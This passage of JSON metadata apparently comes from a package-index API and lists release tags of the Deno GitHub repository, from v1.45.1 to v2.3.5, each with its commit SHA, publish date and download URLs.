v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2